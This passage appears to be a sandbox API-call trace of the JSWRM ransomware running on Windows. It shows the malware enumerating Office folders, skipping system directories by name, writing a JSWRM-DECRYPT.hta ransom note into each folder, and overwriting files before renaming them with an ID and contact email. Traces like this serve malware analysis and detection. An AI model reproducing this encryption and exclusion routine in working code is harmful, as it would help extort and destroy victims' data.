lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.728] CloseHandle (hObject=0x238) returned 1 [0136.728] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ms\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ms\\jswrm-decrypt.hta")) returned 0x20 [0136.728] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ms\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc21a8ad, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc21a8ad, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x48289935, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName=".", cAlternateFileName="")) returned 0x231bc0 [0136.728] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.728] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc21a8ad, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc21a8ad, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x48289935, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="..", cAlternateFileName="")) returned 1 [0136.728] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.728] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.728] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48289935, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x48289935, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x48289935, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.728] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.728] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.728] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.728] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.728] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.728] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.729] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.729] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.729] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.729] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411f0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.729] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc21a8ad, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc21a8ad, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc240ad7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5298, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.729] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.729] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.729] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.729] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.729] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.729] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.729] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.729] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.729] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.729] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.729] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ms\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ms\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.750] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=21144) returned 1 [0136.750] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.750] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5290, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5290, lpOverlapped=0x0) returned 1 [0136.754] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.754] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5290, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5290, lpOverlapped=0x0) returned 1 [0136.754] CloseHandle (hObject=0x314) returned 1 [0136.754] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ms\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ms\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ms\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ms\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.756] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc21a8ad, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc21a8ad, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc240ad7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5298, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.756] FindClose (in: hFindFile=0x231bc0 | out: hFindFile=0x231bc0) returned 1 [0136.756] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf0dcc568, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0dcc568, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1b3ce622, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f9f00, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="msipc.dll", cAlternateFileName="")) returned 1 [0136.756] lstrcmpiW (lpString1="msipc.dll", lpString2=".") returned 1 [0136.756] lstrcmpiW (lpString1="msipc.dll", lpString2="..") returned 1 [0136.756] lstrcmpiW (lpString1="msipc.dll", lpString2="...") returned 1 [0136.756] lstrcmpiW (lpString1="msipc.dll", lpString2="windows") returned -1 [0136.756] lstrcmpiW (lpString1="msipc.dll", lpString2="recovery") returned -1 [0136.756] lstrcmpiW (lpString1="msipc.dll", lpString2="perflogs") returned -1 [0136.756] lstrcmpiW (lpString1="msipc.dll", lpString2="documents and settings") returned 1 [0136.756] lstrcmpiW (lpString1="msipc.dll", lpString2="$RECYCLE.BIN") returned 1 [0136.756] lstrcmpiW (lpString1="msipc.dll", lpString2="system volume information") returned -1 [0136.756] lstrcmpiW (lpString1="msipc.dll", lpString2="msocache") returned -1 [0136.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0136.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll", lpUsedDefaultChar=0x0) returned 9 [0136.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0136.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll", lpUsedDefaultChar=0x0) returned 9 [0136.756] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b3a83c3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b3a83c3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b3a83c3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2126, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="MSIPCEvents.man", cAlternateFileName="MSIPCE~1.MAN")) returned 1 [0136.756] lstrcmpiW (lpString1="MSIPCEvents.man", lpString2=".") returned 1 [0136.756] lstrcmpiW (lpString1="MSIPCEvents.man", lpString2="..") returned 1 [0136.756] lstrcmpiW (lpString1="MSIPCEvents.man", lpString2="...") returned 1 [0136.756] lstrcmpiW (lpString1="MSIPCEvents.man", lpString2="windows") returned -1 [0136.757] lstrcmpiW (lpString1="MSIPCEvents.man", lpString2="recovery") returned -1 [0136.757] lstrcmpiW (lpString1="MSIPCEvents.man", lpString2="perflogs") returned -1 [0136.757] lstrcmpiW (lpString1="MSIPCEvents.man", lpString2="documents and settings") returned 1 [0136.757] lstrcmpiW (lpString1="MSIPCEvents.man", lpString2="$RECYCLE.BIN") returned 1 [0136.757] lstrcmpiW (lpString1="MSIPCEvents.man", lpString2="system volume information") returned -1 [0136.757] lstrcmpiW (lpString1="MSIPCEvents.man", lpString2="msocache") returned -1 [0136.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSIPCEvents.man", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0136.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSIPCEvents.man", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSIPCEvents.man", lpUsedDefaultChar=0x0) returned 15 [0136.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSIPCEvents.man", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0136.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSIPCEvents.man", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSIPCEvents.man", lpUsedDefaultChar=0x0) returned 15 [0136.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.757] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\MSIPCEvents.man" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\msipcevents.man"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.758] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8486) returned 1 [0136.758] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.759] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2120, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x2120, lpOverlapped=0x0) returned 1 [0136.761] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.761] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2120, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x2120, lpOverlapped=0x0) returned 1 [0136.761] CloseHandle (hObject=0x238) returned 1 [0136.761] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\MSIPCEvents.man" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\msipcevents.man"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\MSIPCEvents.man.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\msipcevents.man.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.762] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfaf2dd35, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfaf2dd35, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfaf2dd35, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="nl", cAlternateFileName="")) returned 1 [0136.762] lstrcmpiW (lpString1="nl", lpString2=".") returned 1 [0136.762] lstrcmpiW (lpString1="nl", lpString2="..") returned 1 [0136.762] lstrcmpiW (lpString1="nl", lpString2="...") returned 1 [0136.762] lstrcmpiW (lpString1="nl", lpString2="windows") returned -1 [0136.762] lstrcmpiW (lpString1="nl", lpString2="recovery") returned -1 [0136.762] lstrcmpiW (lpString1="nl", lpString2="perflogs") returned -1 [0136.762] lstrcmpiW (lpString1="nl", lpString2="documents and settings") returned 1 [0136.762] lstrcmpiW (lpString1="nl", lpString2="$RECYCLE.BIN") returned 1 [0136.762] lstrcmpiW (lpString1="nl", lpString2="system volume information") returned -1 [0136.762] lstrcmpiW (lpString1="nl", lpString2="msocache") returned 1 [0136.763] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\nl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\nl\\jswrm-decrypt.hta")) returned 0xffffffff [0136.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.763] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\nl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\nl\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.764] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.764] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.765] CloseHandle (hObject=0x238) returned 1 [0136.765] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\nl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\nl\\jswrm-decrypt.hta")) returned 0x20 [0136.766] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\nl\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfaf2dd35, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfaf2dd35, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x482d60dd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName=".", cAlternateFileName="")) returned 0x231d40 [0136.766] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.766] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfaf2dd35, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfaf2dd35, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x482d60dd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="..", cAlternateFileName="")) returned 1 [0136.766] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.766] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.766] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x482d60dd, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x482d60dd, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x482d60dd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.766] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.766] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.766] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.766] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.766] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.766] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.766] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.766] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.766] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.766] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240ef8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.766] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfaf2dd35, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfaf2dd35, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb43ee0e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5898, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.766] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.766] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.766] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.766] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.766] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.766] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.767] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.767] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.767] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.767] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, 